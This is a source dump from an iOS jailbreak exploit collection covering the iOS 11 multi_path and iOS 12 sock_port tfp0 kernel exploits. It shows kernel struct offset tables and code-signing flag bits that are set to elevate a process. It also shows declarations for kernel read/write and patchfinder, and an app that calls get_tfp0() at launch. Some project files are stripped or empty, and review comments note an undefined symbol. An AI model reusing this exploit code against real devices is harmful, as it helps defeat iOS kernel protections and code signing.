unsigned offsetof_p_gid = 0x34; // proc_t::p_gid (comment was copy-pasted as p_uid)
unsigned offsetof_p_ruid = 0x38; // proc_t::p_ruid (comment was copy-pasted as p_uid)
unsigned offsetof_p_rgid = 0x3c; // proc_t::p_rgid (comment was copy-pasted as p_uid)
unsigned offsetof_p_ucred = 0x100; // proc_t::p_ucred
unsigned offsetof_p_csflags = 0x2a8; // proc_t::p_csflags
unsigned offsetof_itk_self = 0xD8; // task_t::itk_self (convert_task_to_port)
unsigned offsetof_itk_sself = 0xE8; // task_t::itk_sself (task_get_special_port)
unsigned offsetof_itk_bootstrap = 0x2b8; // task_t::itk_bootstrap (task_get_special_port)
unsigned offsetof_itk_space = 0x308; // task_t::itk_space
unsigned offsetof_ip_mscount = 0x9C; // ipc_port_t::ip_mscount (ipc_port_make_send)
unsigned offsetof_ip_srights = 0xA0; // ipc_port_t::ip_srights (ipc_port_make_send)
unsigned offsetof_ip_kobject = 0x68; // ipc_port_t::ip_kobject
unsigned offsetof_p_textvp = 0x248; // proc_t::p_textvp
unsigned offsetof_p_textoff = 0x250; // proc_t::p_textoff
unsigned offsetof_p_cputype = 0x2c0; // proc_t::p_cputype
unsigned offsetof_p_cpu_subtype = 0x2c4; // proc_t::p_cpu_subtype
unsigned offsetof_special = 2 * sizeof(long); // host::special
unsigned offsetof_ipc_space_is_table = 0x20; // ipc_space::is_table?..

unsigned offsetof_ucred_cr_uid = 0x18; // ucred::cr_uid
unsigned offsetof_ucred_cr_ruid = 0x1c; // ucred::cr_ruid
unsigned offsetof_ucred_cr_svuid = 0x20; // ucred::cr_svuid
unsigned offsetof_ucred_cr_ngroups = 0x24; // ucred::cr_ngroups
unsigned offsetof_ucred_cr_groups = 0x28; // ucred::cr_groups
unsigned offsetof_ucred_cr_rgid = 0x68; // ucred::cr_rgid
unsigned offsetof_ucred_cr_svgid = 0x6c; // ucred::cr_svgid

unsigned offsetof_v_type = 0x70; // vnode::v_type
unsigned offsetof_v_id = 0x74; // vnode::v_id
unsigned offsetof_v_ubcinfo = 0x78; // vnode::v_ubcinfo

unsigned offsetof_ubcinfo_csblobs = 0x50; // ubc_info::csblobs

unsigned offsetof_csb_cputype = 0x8; // cs_blob::csb_cputype
unsigned offsetof_csb_flags = 0x12; // cs_blob::csb_flags
unsigned offsetof_csb_base_offset = 0x16; // cs_blob::csb_base_offset
unsigned offsetof_csb_entitlements_offset = 0x98; // cs_blob::csb_entitlements
unsigned offsetof_csb_signer_type = 0xA0; // cs_blob::csb_signer_type
unsigned offsetof_csb_platform_binary = 0xA4; // cs_blob::csb_platform_binary
unsigned offsetof_csb_platform_path = 0xA8; // cs_blob::csb_platform_path

unsigned offsetof_t_flags = 0x3a0; // task::t_flags


-------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/jelbrek/offsetof.h: --------------------------------------------------------------------------------
// Declarations for the offset globals defined in offsetof.c, plus the
// code-signing flag bits used by empower() in jelbrek.m.
// NOTE(review): no include guard. offsetof_ucred_cr_gid is declared below
// but offsetof.c defines no such symbol.

extern unsigned offsetof_p_pid;
extern unsigned offsetof_task;
extern unsigned offsetof_p_uid;
extern unsigned offsetof_p_gid;
extern unsigned offsetof_p_ruid;
extern unsigned offsetof_p_rgid;
extern unsigned offsetof_p_ucred;
extern unsigned offsetof_p_csflags;
extern unsigned offsetof_itk_self;
extern unsigned offsetof_itk_sself;
extern unsigned offsetof_itk_bootstrap;
extern unsigned offsetof_itk_space;
extern unsigned offsetof_ip_mscount;
extern unsigned offsetof_ip_srights;
extern unsigned offsetof_ip_kobject;
extern unsigned offsetof_p_textvp;
extern unsigned offsetof_p_textoff;
extern unsigned offsetof_p_cputype;
extern unsigned offsetof_p_cpu_subtype;
extern unsigned offsetof_special;
extern unsigned offsetof_ipc_space_is_table;

extern unsigned offsetof_ucred_cr_uid;
extern unsigned offsetof_ucred_cr_ruid;
extern unsigned offsetof_ucred_cr_gid;  // NOTE(review): undefined in offsetof.c
extern unsigned offsetof_ucred_cr_rgid;
extern unsigned offsetof_ucred_cr_svgid;
extern unsigned offsetof_ucred_cr_groups;
extern unsigned offsetof_ucred_cr_ngroups;
extern unsigned offsetof_ucred_cr_svuid;

extern unsigned offsetof_v_type;
extern unsigned offsetof_v_id;
extern unsigned offsetof_v_ubcinfo;

extern unsigned offsetof_ubcinfo_csblobs;

extern unsigned offsetof_csb_cputype;
extern unsigned offsetof_csb_flags;
extern unsigned offsetof_csb_base_offset;
extern unsigned offsetof_csb_entitlements_offset;
extern unsigned offsetof_csb_signer_type;
extern unsigned offsetof_csb_platform_binary;
extern unsigned offsetof_csb_platform_path;

extern unsigned offsetof_t_flags;

/* p_csflags bit values, mirroring XNU's sys/codesign.h. empower() sets
 * CS_PLATFORM_BINARY | CS_INSTALLER | CS_GET_TASK_ALLOW | CS_DEBUGGED and
 * clears CS_RESTRICT | CS_HARD | CS_KILL. */
#define CS_VALID 0x0000001 /* dynamically valid */
#define CS_ADHOC 0x0000002 /* ad hoc signed */
#define CS_GET_TASK_ALLOW 0x0000004 /* has get-task-allow entitlement */
#define CS_INSTALLER 0x0000008 /* has installer entitlement */

#define CS_HARD 0x0000100 /* don't load invalid pages */
#define CS_KILL 0x0000200 /* kill process if it becomes invalid */
#define CS_CHECK_EXPIRATION 0x0000400 /* force expiration checking */
#define CS_RESTRICT 0x0000800 /* tell dyld to treat restricted */
#define CS_ENFORCEMENT 0x0001000 /* require enforcement */
#define CS_REQUIRE_LV 0x0002000 /* require library validation */
#define CS_ENTITLEMENTS_VALIDATED 0x0004000

#define CS_ALLOWED_MACHO 0x00ffffe

#define CS_EXEC_SET_HARD 0x0100000 /* set CS_HARD on any exec'ed process */
#define CS_EXEC_SET_KILL 0x0200000 /* set CS_KILL on any exec'ed process */
#define CS_EXEC_SET_ENFORCEMENT 0x0400000 /* set CS_ENFORCEMENT on any exec'ed process */
#define CS_EXEC_SET_INSTALLER 0x0800000 /* set CS_INSTALLER on any exec'ed process */

#define CS_KILLED 0x1000000 /* was killed by kernel for invalidity */
#define CS_DYLD_PLATFORM 0x2000000 /* dyld used to load this is a platform binary */
#define CS_PLATFORM_BINARY 0x4000000 /* this is a platform binary */
#define CS_PLATFORM_PATH 0x8000000 /* platform binary by the fact of path (osx only) */

#define CS_DEBUGGED 0x10000000 /* process is currently or has previously been debugged and allowed to run with invalid pages */
#define CS_SIGNED 0x20000000 /* process has a signature (may have gone invalid) */
#define CS_DEV_CODE 0x40000000 /* code is dev signed, cannot be loaded into prod signed code (will go away with rdar://problem/28322552) */

-------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/jelbrek/patchfinder64.h: --------------------------------------------------------------------------------
#ifndef PATCHFINDER64_H_
#define PATCHFINDER64_H_

// Kernel address lookups for the image described to init_kernel(). The
// implementation is not in this chunk; what the find_* functions return when
// a pattern is absent is not visible here, and trust_bin() in jelbrek.m does
// not check their results before using them.
int init_kernel(uint64_t base, const char *filename);
void term_kernel(void);

// Fun part
uint64_t find_allproc(void);
uint64_t find_add_x0_x0_0x40_ret(void);
uint64_t find_copyout(void);
uint64_t find_bzero(void);
uint64_t find_bcopy(void);
uint64_t find_rootvnode(void);
uint64_t find_trustcache(void);
uint64_t find_amficache(void);

#endif

-------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/kmem.h: --------------------------------------------------------------------------------
#ifndef kmem_h
#define kmem_h

// Kernel read/write wrappers over the `tfp0` port. NOTE(review): mach_port_t
// and the fixed-width types are used with no include, so this header only
// compiles after the includer has pulled in the Mach and stdint headers.
// jelbrek/ does not use these; it has its own kread*/kwrite* in kern_utils.h.
extern mach_port_t tfp0;

uint32_t rk32(uint64_t kaddr);
uint64_t rk64(uint64_t kaddr);

void wk32(uint64_t kaddr, uint32_t val);
void wk64(uint64_t kaddr, uint64_t val);

#endif
-------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/main.m: --------------------------------------------------------------------------------
//
//  main.m
//  multi_path
//
//  Created by Ian Beer on 5/28/18.
//  Copyright © 2018 Ian Beer. All rights reserved.
//

// NOTE(review): the UIKit header name on the next line was lost in extraction.
#import
#import "AppDelegate.h"

/// Xcode template entry point: hands control to UIKit with AppDelegate as
/// the application delegate. Everything interesting happens from the
/// -go: action in ViewController.m.
int main(int argc, char * argv[]) {
    @autoreleasepool {
        return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class]));
    }
}
-------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/multi_path.entitlements: --------------------------------------------------------------------------------
<!-- plist markup stripped in extraction; only the entitlement key survives -->
com.apple.developer.networking.multipath
-------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/offsets.h: --------------------------------------------------------------------------------
#ifndef offsets_h
#define offsets_h

// Indices into the per-version offset tables in offsets.m (looked up via
// koffset()). Order must match the array initialisers there.
enum kstruct_offset {
    /* struct task */
    KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,
    KSTRUCT_OFFSET_TASK_REF_COUNT,
    KSTRUCT_OFFSET_TASK_ACTIVE,
    KSTRUCT_OFFSET_TASK_VM_MAP,
    KSTRUCT_OFFSET_TASK_NEXT,
KSTRUCT_OFFSET_TASK_PREV, 12 | KSTRUCT_OFFSET_TASK_ITK_SPACE, 13 | KSTRUCT_OFFSET_TASK_BSD_INFO, 14 | 15 | /* struct ipc_port */ 16 | KSTRUCT_OFFSET_IPC_PORT_IO_BITS, 17 | KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES, 18 | KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE, 19 | KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT, 20 | KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER, 21 | KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT, 22 | KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG, 23 | KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT, 24 | KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS, 25 | 26 | /* struct proc */ 27 | KSTRUCT_OFFSET_PROC_PID, 28 | KSTRUCT_OFFSET_PROC_P_FD, 29 | 30 | /* struct filedesc */ 31 | KSTRUCT_OFFSET_FILEDESC_FD_OFILES, 32 | 33 | /* struct fileproc */ 34 | KSTRUCT_OFFSET_FILEPROC_F_FGLOB, 35 | 36 | /* struct fileglob */ 37 | KSTRUCT_OFFSET_FILEGLOB_FG_DATA, 38 | 39 | /* struct socket */ 40 | KSTRUCT_OFFSET_SOCKET_SO_PCB, 41 | 42 | /* struct pipe */ 43 | KSTRUCT_OFFSET_PIPE_BUFFER, 44 | 45 | /* struct ipc_space */ 46 | KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE, 47 | KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE, 48 | 49 | KFREE_ADDR_OFFSET, 50 | }; 51 | 52 | int koffset(enum kstruct_offset offset); 53 | void offsets_init(void); 54 | 55 | #endif 56 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/offsets.m: -------------------------------------------------------------------------------- 1 | #import 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | #include "offsets.h" 10 | 11 | int* offsets = NULL; 12 | 13 | int kstruct_offsets_11_0[] = { 14 | 0xb, // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE, 15 | 0x10, // KSTRUCT_OFFSET_TASK_REF_COUNT, 16 | 0x14, // KSTRUCT_OFFSET_TASK_ACTIVE, 17 | 0x20, // KSTRUCT_OFFSET_TASK_VM_MAP, 18 | 0x28, // KSTRUCT_OFFSET_TASK_NEXT, 19 | 0x30, // KSTRUCT_OFFSET_TASK_PREV, 20 | 0x308, // KSTRUCT_OFFSET_TASK_ITK_SPACE 21 | 0x368, // KSTRUCT_OFFSET_TASK_BSD_INFO, 22 | 23 | 0x0, // 
KSTRUCT_OFFSET_IPC_PORT_IO_BITS, 24 | 0x4, // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES, 25 | 0x40, // KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE, 26 | 0x50, // KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT, 27 | 0x60, // KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER, 28 | 0x68, // KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT, 29 | 0x88, // KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG, 30 | 0x90, // KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT, 31 | 0xa0, // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS, 32 | 33 | 0x10, // KSTRUCT_OFFSET_PROC_PID, 34 | 0x108, // KSTRUCT_OFFSET_PROC_P_FD 35 | 36 | 0x0, // KSTRUCT_OFFSET_FILEDESC_FD_OFILES 37 | 38 | 0x8, // KSTRUCT_OFFSET_FILEPROC_F_FGLOB 39 | 40 | 0x38, // KSTRUCT_OFFSET_FILEGLOB_FG_DATA 41 | 42 | 0x10, // KSTRUCT_OFFSET_SOCKET_SO_PCB 43 | 44 | 0x10, // KSTRUCT_OFFSET_PIPE_BUFFER 45 | 46 | 0x14, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE 47 | 0x20, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE 48 | 49 | 0x6c, // KFREE_ADDR_OFFSET 50 | }; 51 | 52 | int kstruct_offsets_11_3[] = { 53 | 0xb, // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE, 54 | 0x10, // KSTRUCT_OFFSET_TASK_REF_COUNT, 55 | 0x14, // KSTRUCT_OFFSET_TASK_ACTIVE, 56 | 0x20, // KSTRUCT_OFFSET_TASK_VM_MAP, 57 | 0x28, // KSTRUCT_OFFSET_TASK_NEXT, 58 | 0x30, // KSTRUCT_OFFSET_TASK_PREV, 59 | 0x308, // KSTRUCT_OFFSET_TASK_ITK_SPACE 60 | 0x368, // KSTRUCT_OFFSET_TASK_BSD_INFO, 61 | 62 | 0x0, // KSTRUCT_OFFSET_IPC_PORT_IO_BITS, 63 | 0x4, // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES, 64 | 0x40, // KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE, 65 | 0x50, // KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT, 66 | 0x60, // KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER, 67 | 0x68, // KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT, 68 | 0x88, // KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG, 69 | 0x90, // KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT, 70 | 0xa0, // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS, 71 | 72 | 0x10, // KSTRUCT_OFFSET_PROC_PID, 73 | 0x108, // KSTRUCT_OFFSET_PROC_P_FD 74 | 75 | 0x0, // KSTRUCT_OFFSET_FILEDESC_FD_OFILES 76 | 77 | 0x8, // KSTRUCT_OFFSET_FILEPROC_F_FGLOB 78 | 79 | 0x38, // KSTRUCT_OFFSET_FILEGLOB_FG_DATA 80 | 81 | 
0x10, // KSTRUCT_OFFSET_SOCKET_SO_PCB 82 | 83 | 0x10, // KSTRUCT_OFFSET_PIPE_BUFFER 84 | 85 | 0x14, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE 86 | 0x20, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE 87 | 88 | 0x7c, // KFREE_ADDR_OFFSET 89 | }; 90 | 91 | int koffset(enum kstruct_offset offset) { 92 | if (offsets == NULL) { 93 | printf("need to call offsets_init() prior to querying offsets\n"); 94 | return 0; 95 | } 96 | return offsets[offset]; 97 | } 98 | 99 | 100 | void offsets_init() { 101 | if (@available(iOS 11.4, *)) { 102 | printf("this bug is patched in iOS 11.4 and above\n"); 103 | exit(EXIT_FAILURE); 104 | } else if (@available(iOS 11.3, *)) { 105 | printf("offsets selected for iOS 11.3 or above\n"); 106 | offsets = kstruct_offsets_11_3; 107 | } else if (@available(iOS 11.0, *)) { 108 | printf("offsets selected for iOS 11.0 to 11.2.6\n"); 109 | offsets = kstruct_offsets_11_0; 110 | } else { 111 | printf("iOS version too low, 11.0 required\n"); 112 | exit(EXIT_FAILURE); 113 | } 114 | } 115 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/multi_path/multi_path/sploit.h: -------------------------------------------------------------------------------- 1 | #ifndef sploit_h 2 | #define sploit_h 3 | 4 | mach_port_t go(void); 5 | 6 | #endif 7 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 12/readme.md: -------------------------------------------------------------------------------- 1 | This is iOS 12 stuff. You may be able to reuse some of it on iOS 13, but don't get your hopes too high. 2 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/readme.md: -------------------------------------------------------------------------------- 1 | Only the most stable one is linked here. 
2 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/Makefile: -------------------------------------------------------------------------------- 1 | TARGET = sock_port 2 | 3 | .PHONY: all clean 4 | 5 | all: clean 6 | xcodebuild clean build CODE_SIGN_IDENTITY="" CODE_SIGNING_REQUIRED=NO PRODUCT_BUNDLE_IDENTIFIER="com.jakeashacks.sock-port" -sdk iphoneos -configuration Debug 7 | ln -sf build/Debug-iphoneos Payload 8 | zip -r9 $(TARGET).ipa Payload/$(TARGET).app 9 | 10 | clean: 11 | rm -rf build Payload $(TARGET).ipa 12 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/README.md: -------------------------------------------------------------------------------- 1 | # sock_port 2 | 3 | iOS 10.0-12.2 (+12.4) tfp0 for all devices (in theory). 4 | 5 | Some info: 6 | - Uses socket bug by Ned Williamson 7 | - Uses some things by Ian Beer, machswap, SockPuppet 8 | - The rest of the code is licensed under GPL, unless given permission explicitly to distribute closed-source (the unc0ver team, pwn20wnd and sbingner, have this permission) 9 | 10 | Write-up: https://raw.githubusercontent.com/jakeajames/sock_port/master/sock_port.pdf 11 | 12 | Thanks to Pwn20wnd and GeoSn0w & users for helping with testing on multiple devices (and Corellium). 
13 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GeoSn0w/OpenJailbreak/0acf2c4ea664c3cffb3492fae566838c2ba9abfd/iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port.pdf -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | IDEDidComputeMac32BitWarning 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port.xcodeproj/project.xcworkspace/xcuserdata/jakejames.xcuserdatad/UserInterfaceState.xcuserstate: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GeoSn0w/OpenJailbreak/0acf2c4ea664c3cffb3492fae566838c2ba9abfd/iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port.xcodeproj/project.xcworkspace/xcuserdata/jakejames.xcuserdatad/UserInterfaceState.xcuserstate -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port.xcodeproj/project.xcworkspace/xcuserdata/pwn20wnd.xcuserdatad/UserInterfaceState.xcuserstate: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/GeoSn0w/OpenJailbreak/0acf2c4ea664c3cffb3492fae566838c2ba9abfd/iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port.xcodeproj/project.xcworkspace/xcuserdata/pwn20wnd.xcuserdatad/UserInterfaceState.xcuserstate -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port.xcodeproj/xcshareddata/xcschemes/sock_port.xcscheme: -------------------------------------------------------------------------------- 1 | 2 | 5 | 8 | 9 | 15 | 21 | 22 | 23 | 24 | 25 | 30 | 31 | 33 | 39 | 40 | 41 | 43 | 49 | 50 | 51 | 52 | 53 | 59 | 60 | 61 | 62 | 63 | 64 | 74 | 76 | 82 | 83 | 84 | 85 | 86 | 87 | 93 | 95 | 101 | 102 | 103 | 104 | 106 | 107 | 110 | 111 | 112 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port.xcodeproj/xcuserdata/jakejames.xcuserdatad/xcdebugger/Breakpoints_v2.xcbkptlist: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 8 | 20 | 21 | 22 | 24 | 36 | 37 | 38 | 40 | 52 | 53 | 54 | 55 | 56 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port.xcodeproj/xcuserdata/jakejames.xcuserdatad/xcschemes/xcschememanagement.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | SchemeUserState 6 | 7 | socket_free.xcscheme 8 | 9 | orderHint 10 | 0 11 | 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port.xcodeproj/xcuserdata/pwn20wnd.xcuserdatad/xcschemes/xcschememanagement.plist: 
-------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | SchemeUserState 6 | 7 | sock_port.xcscheme_^#shared#^_ 8 | 9 | orderHint 10 | 0 11 | 12 | 13 | SuppressBuildableAutocreation 14 | 15 | 82F179EB22DF4ED700231F8C 16 | 17 | primary 18 | 19 | 20 | 82F17A0322DF4ED800231F8C 21 | 22 | primary 23 | 24 | 25 | 82F17A0E22DF4ED800231F8C 26 | 27 | primary 28 | 29 | 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port/AppDelegate.h: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.h 3 | // sock_port 4 | // 5 | // Created by Jake James on 7/17/19. 6 | // Copyright © 2019 Jake James. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface AppDelegate : UIResponder 12 | 13 | @property (strong, nonatomic) UIWindow *window; 14 | 15 | 16 | @end 17 | 18 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port/AppDelegate.m: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.m 3 | // sock_port 4 | // 5 | // Created by Jake James on 7/17/19. 6 | // Copyright © 2019 Jake James. All rights reserved. 7 | // 8 | 9 | #import "AppDelegate.h" 10 | #include "exploit.h" 11 | 12 | @interface AppDelegate () 13 | 14 | @end 15 | 16 | @implementation AppDelegate 17 | 18 | 19 | - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions { 20 | mach_port_t tfp0 = get_tfp0(); 21 | return YES; 22 | } 23 | 24 | 25 | - (void)applicationWillResignActive:(UIApplication *)application { 26 | // Sent when the application is about to move from active to inactive state. 
This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state. 27 | // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game. 28 | } 29 | 30 | 31 | - (void)applicationDidEnterBackground:(UIApplication *)application { 32 | // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later. 33 | // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits. 34 | } 35 | 36 | 37 | - (void)applicationWillEnterForeground:(UIApplication *)application { 38 | // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background. 39 | } 40 | 41 | 42 | - (void)applicationDidBecomeActive:(UIApplication *)application { 43 | // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface. 44 | } 45 | 46 | 47 | - (void)applicationWillTerminate:(UIApplication *)application { 48 | // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:. 
49 | } 50 | 51 | 52 | @end 53 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port/Assets.xcassets/AppIcon.appiconset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "iphone", 5 | "size" : "20x20", 6 | "scale" : "2x" 7 | }, 8 | { 9 | "idiom" : "iphone", 10 | "size" : "20x20", 11 | "scale" : "3x" 12 | }, 13 | { 14 | "idiom" : "iphone", 15 | "size" : "29x29", 16 | "scale" : "2x" 17 | }, 18 | { 19 | "idiom" : "iphone", 20 | "size" : "29x29", 21 | "scale" : "3x" 22 | }, 23 | { 24 | "idiom" : "iphone", 25 | "size" : "40x40", 26 | "scale" : "2x" 27 | }, 28 | { 29 | "idiom" : "iphone", 30 | "size" : "40x40", 31 | "scale" : "3x" 32 | }, 33 | { 34 | "idiom" : "iphone", 35 | "size" : "60x60", 36 | "scale" : "2x" 37 | }, 38 | { 39 | "idiom" : "iphone", 40 | "size" : "60x60", 41 | "scale" : "3x" 42 | }, 43 | { 44 | "idiom" : "ipad", 45 | "size" : "20x20", 46 | "scale" : "1x" 47 | }, 48 | { 49 | "idiom" : "ipad", 50 | "size" : "20x20", 51 | "scale" : "2x" 52 | }, 53 | { 54 | "idiom" : "ipad", 55 | "size" : "29x29", 56 | "scale" : "1x" 57 | }, 58 | { 59 | "idiom" : "ipad", 60 | "size" : "29x29", 61 | "scale" : "2x" 62 | }, 63 | { 64 | "idiom" : "ipad", 65 | "size" : "40x40", 66 | "scale" : "1x" 67 | }, 68 | { 69 | "idiom" : "ipad", 70 | "size" : "40x40", 71 | "scale" : "2x" 72 | }, 73 | { 74 | "idiom" : "ipad", 75 | "size" : "76x76", 76 | "scale" : "1x" 77 | }, 78 | { 79 | "idiom" : "ipad", 80 | "size" : "76x76", 81 | "scale" : "2x" 82 | }, 83 | { 84 | "idiom" : "ipad", 85 | "size" : "83.5x83.5", 86 | "scale" : "2x" 87 | } 88 | ], 89 | "info" : { 90 | "version" : 1, 91 | "author" : "xcode" 92 | } 93 | } -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 12/tfp0 Kernel 
Exploits/sock_port/sock_port/Base.lproj/LaunchScreen.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port/Base.lproj/Main.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | CFBundleDevelopmentRegion 6 | $(DEVELOPMENT_LANGUAGE) 7 | CFBundleExecutable 8 | $(EXECUTABLE_NAME) 9 | CFBundleIdentifier 10 | $(PRODUCT_BUNDLE_IDENTIFIER) 11 | CFBundleInfoDictionaryVersion 12 | 6.0 13 | CFBundleName 14 | $(PRODUCT_NAME) 15 | CFBundlePackageType 16 | APPL 17 | CFBundleShortVersionString 18 | 1.0 19 | CFBundleVersion 20 | 1 21 | LSRequiresIPhoneOS 22 | 23 | UILaunchStoryboardName 24 | LaunchScreen 25 | UIMainStoryboardFile 26 | Main 27 | UIRequiredDeviceCapabilities 28 | 29 | armv7 30 | 31 | UISupportedInterfaceOrientations 32 | 33 | UIInterfaceOrientationPortrait 34 | UIInterfaceOrientationLandscapeLeft 35 | UIInterfaceOrientationLandscapeRight 36 | 37 | UISupportedInterfaceOrientations~ipad 38 | 39 | UIInterfaceOrientationPortrait 40 | UIInterfaceOrientationPortraitUpsideDown 41 | UIInterfaceOrientationLandscapeLeft 42 | UIInterfaceOrientationLandscapeRight 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port/ViewController.h: 
